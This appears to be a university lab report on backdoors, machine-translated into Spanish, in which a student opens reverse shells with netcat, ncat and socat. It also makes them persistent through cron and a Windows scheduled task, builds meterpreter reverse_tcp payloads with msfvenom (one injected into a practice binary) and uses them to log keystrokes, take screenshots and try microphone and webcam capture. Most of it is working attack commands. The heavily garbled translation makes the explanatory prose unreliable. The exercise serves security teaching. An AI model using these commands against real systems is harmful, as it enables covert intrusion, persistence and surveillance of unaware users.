20175224 puerta de atrás Exp2 en contra de los principios y la práctica de tecnología de red 2019-2020-2

directorio


En primer lugar, la descripción del contenido y experimentales respondieron preguntas básicas
En segundo lugar, los instrumentos para preparar

  • Ver WindowsIP y LinuxIP
  • Ventanas get Linuxshell
  • Linux obtener shell de Windows
  • Transmitir datos utilizando nc

En tercer lugar, el proceso experimental

  • Uso NETCAT obtener el huésped que opera Shell, inicio cron
  • Uso Socat obtener el huésped que opera Shell, planes de comenzar la tarea
  • Uso de MSF meterpreter (u otro software) para generar un archivo ejecutable, o el uso NCAT socat al host y se ejecutan para obtener el anfitrión Shell
  • Uso de MSF meterpreter (u otro software) para generar el host de destino para obtener el contenido de audio, cámara, keyloggers, etc., y tratar de poner a la derecha
  • Alternativamente puntos: Uso de la MSF generar el código shell, se vertió en 1 pwn1 en la práctica, la conexión en dos tiempos de adquisición de Shell

En cuarto lugar, el problema con el pensamiento



 

En primer lugar, la descripción del contenido y las preguntas contestadas básicas experimentales


1, el contenido del experimento
(1) utilizando el anfitrión adquirido operativo netcat Shell, CRON START (0,5 min)

(2) el uso socat obtener el huésped que opera Shell, planes de lanzar la tarea (0,5 puntos)

(3) utilizando el meterpreter MSF (u otro software) para generar un archivo ejecutable, o el uso de NCAT socat transferidos a la del anfitrión y funciona un anfitrión adquiere Shell (0,5 min)

(4) mediante el meterpreter MSF (u otro software) para generar el host de destino adquiere contenido de audio, la cámara, y similares grabar las pulsaciones de teclado, y tratar de proporcionar a la derecha (2 minutos)

(5) más contenido opcional: MSF generado utilizando el código shell, se vertió en 1 pwn1 en la práctica, la conexión en dos tiempos de adquisición de Shell (1 min), además de los contenidos de este experimento informe junto escrito.

2, contestar preguntas básicas
1) incluyen una puerta trasera que se pueda imaginar posibles formas de entrar en su sistema?

  • Linux cuenta de equipo contraseña truco
  • Reemplazar programa de inicio de sesión que proporciona contraseña especial Invisible Sign
  • puerta trasera oculta en el sistema de archivos

(2) ¿Cómo sabes ejemplificado por la puerta de atrás para poner en marcha (ganar y Linux) forma?

  • Linux: la función crontab por los troyanos para iniciar el temporizador, el panel de control será capaz de mantener el monitor de estado periódicamente iniciar la puerta de atrás, sino que también puede unirse a shellcode luego se inyecta normal y saludable abrir la puerta trasera.
  • ganar: la aceptación pasiva de puertas traseras o descarga, cuando la parte lesionada clic para ejecutar los programas de puerta trasera aperturas.

Que le da una función de imagen profunda (3) Meterpreter allí?

  • Funciones básicas (conectividad básica, la ejecución de instrucciones)
  • Extensiones (como la recogida de información de los usuarios, los servicios de instalación y otras funciones)

(4) ¿Cómo encuentras el sistema no se ha instalado la puerta de atrás?

  • Instalar el software antivirus: de protección en tiempo real.
  • Detectar conexión de red: Comprobar para IP para establecer una conexión con la máquina.


En segundo lugar, los instrumentos para preparar


  • Ver WindowsIP y LinuxIP
    • Bajo el mando de Windowsipconfig

    • Linux usandoifconfig

Ventanas para conseguir shell de Linux

  • Uso NCAT programa, entrada de ncat.exe -l -p 5224supervisar el puerto 5224 de la máquina

  • Mediante el comando nc en el kali -eopción, la entrada nc 192.168.1.2 5224 -e /bin/shdel puerto de conexión inversa de Windows 5224 anfitriones

  • En el lado de Windows, cáscara de acceso del kali

Linux obtener shell de Windows

  • Uso ncdel monitor de comandos 5224de puerto

  • En Windows, utilice el ncat.exedel programa de -eopción de alojar kali conexión inversa 5224puerto

  • En este punto se puede ver pronta kali de comandos de Windows, se puede introducir el comando correspondiente de Windows (introduzca aquí dir)

Transmitir datos utilizando nc
  • monitores de Windows 5224puerto

  • Bajo Kali está conectada a un equipo con Windows 5224puerto

  • El establecimiento de una conexión de transmisión de datos



 

En tercer lugar, el proceso experimental

Uso NETCAT obtener el huésped que opera Shell, inicio cron

 

  • En monitores de Windows 5224puerto

  • En Kali, se lava con crontab -eeditar una tarea programada, seleccione el editor3

  • Añadir una línea al final 24 * * * * /bin/netcat 192.168.1.2 5224 -e /bin/sh, lo que significa que la conexión inversa de hosts de Windows a los 24 minutos de cada hora 5224del puerto

  • 14:24 tiempo en tiempo, se han obtenido en el kali shell, los comandos se pueden introducir

 

Uso Socat obtener el huésped que opera Shell, planes de comenzar la tarea

socatEs ncatuna versión mejorada del formato que utiliza socat [options] <address> <address>, dos de los cuales dirección es obligatoria, y las opciones son opcionales.
socat función básica es la de crear dos datos de flujo de bytes bidireccionales se transmite entre los mismos, el parámetro es la dirección de los cuales representa una nueva dirección. El flujo de llamada representa el flujo de datos, y los datos puede tener muchos tipos diferentes, el comando requiere una serie de opciones para correspondientemente varios tipos de flujo de datos definidos y descritos.

  • En el sistema de win10, haga clic en la esquina inferior izquierda de la pantalla de iconos de Windows, seleccione "Administración de equipos" (o simplemente buscar "Administración de equipos")

  • Crear una tarea en el Programador de tareas, para rellenar el nombre de la tarea, y crear un nuevo disparador

  • En funcionamiento - Elija su> programa o script socat.exeruta del archivo, agregar una columna para anotar los parámetros tcp-listen:5224 exec:cmd.exe,pty,stderr, este comando hace es cmd.exeobligar al puerto 5224, mientras que el cmd.exede la stderrredirección a stdoutla

  • Una vez creada, la tarea de descubrimiento está listo, pulse Windows + L llave para bloquear el ordenador cuando se abre de nuevo, encontrar la tarea que ha creado, haga doble clic, puede crear una tarea de descubrimiento antes de la carrera ha comenzado

  • En este punto, introduzca el comando en el entorno de Kali socat - tcp:192.168.1.2:5224, el primer argumento aquí -representan la entrada estándar y de salida, la segunda corriente al puerto de Windows 5224 anfitrión, se puede encontrar en este momento ha obtenido con éxito una cáscara cmd

 

meterpreter MSF utilizando un archivo ejecutable utilizando NCAT socat o transferidos al huésped y el anfitrión de explotación adquiridos Shell

  • comando de entrada msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.182.128 LPORT=5224 -f exe > 20175224_backdoor.exede generación de puerta trasera

    Nota La dirección IP es LinuxIP

  • El próximo Windows entrada en el modo de recepciónncat.exe -lv 5224 > 20175224_backdoor.exe
  • Linux ejecutado nc 192.168.1.2 5224 < 20175224_backdoor.exeNota Si cierra el software de matar el virus

    La dirección IP de la máquina que es WindowsIP

  • Con éxito la transmisión y recepción de archivos

  • Kali terminal abierto, introducir msfconsolecomandos en la consola de MSF

  • Introducir use exploit/multi/handleren el módulo de monitor

  • De entrada set payload windows/meterpreter/reverse_tcpconfiguración de carga útil

  • Secuencialmente introducido set LHOST 192.168.182.128y set LPORT 5224establecer la IP y el puerto

    Tenga en cuenta que en este momento cuando la dirección IP especificada LinuxIP, y genera la misma puerta trasera IP

  • La instalación es completa, la escucha de inicioexploit

  • Puerta trasera se ejecuta en Windows

  • kali ha recibido conexión de host de Windows, mando a distancia y conseguir la concha

 

MSF meterpreter adquirir el contenido usando el host de destino genera audio, cámara, pulsaciones registros

  • Use record_miclas instrucciones se pueden interceptar un (escritorio auricular porque la familia tenía ningún uso para él no puede lograrse) de audio

  • Use webcam_snaplas instrucciones se pueden utilizar la cámara para tomar fotografías (de escritorio en casa, porque la cámara no está configurado y por lo tanto no pueden ser alcanzados)

  • Use screenshotlas instrucciones pueden ser capturas de pantalla

  • El uso de keyscan_startuna instrucción para iniciar la grabación de las pulsaciones de teclas utilizando la keyscan_dumpinstrucción de lectura de las pulsaciones de teclas grabadas

 

Alternativamente puntos: Uso de la MSF generar el código shell, se vertió en 1 pwn1 en la práctica, la conexión en dos tiempos de adquisición de Shell

  • Utilice el comando msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.182.128 LPORT=5224 -x /root/Desktop/20175224/exp2/pwn1 -f elf > 5224pwngenera archivo de plantilla de código shell pwn1 este formato de archivo 5224pwn Elf (se hace referencia aquí https://www.cnblogs.com/clever-universe/p/8691365.html)

  • comando de entrada msfconsoleen la línea de comandos MSF
uso exploit / multi / handler / * controlador en el modo de * / 

carga útil SET Linux / x86 / Meterpreter / reverse_tcp / * conjunto correspondiente a la generada puerta trasera * carga / 

Mostrar Opciones / * comprobar el estado actual de la información * / 

SET lhost 192.168.182.128 / * LHOST conjunto, donde ip es Linux * ip / del atacante 

del conjunto lport 5224 / * * conjunto lport / 

explotación / * iniciar el escucha * /

  

  • Ejecute el archivo 5224pwn puerta trasera en kali,在kali中执行pwn2时应先加权限 chmod +x 5224pwn
  • En este punto el atacante Linux ha ganado conectado atacante Linux, y obtener una cáscara en el control remoto


 

En cuarto lugar, el problema con el pensamiento

Los problemas encontrados en el experimento

  • Pregunta 1: uso kali nc recuperarse después de la conexión de host no tiene ninguna pantalla

  • Problema 1 Solución: En el espacio en blanco, introduzca un comando, como lsetc., y luego pulse Intro

Experiencia Experimental

       La puerta trasera que hacer es el experimento, el experimento de este principio que el primer experimento a ser más fácil de entender, pero debido a que desea utilizar para operar el software de modo que la primera vez será un poco de dificultad. A través de este experimento, mi dominio del conocimiento mejorado de manera significativa, puede aprender mucho de las cosas, esto es muy delicioso.

        Los experimentos también se sienten muy interesante, deseando que llegue la próxima aprendizaje!

Supongo que te gusta

Origin www.cnblogs.com/axyaxy/p/12503668.html
Recomendado
Clasificación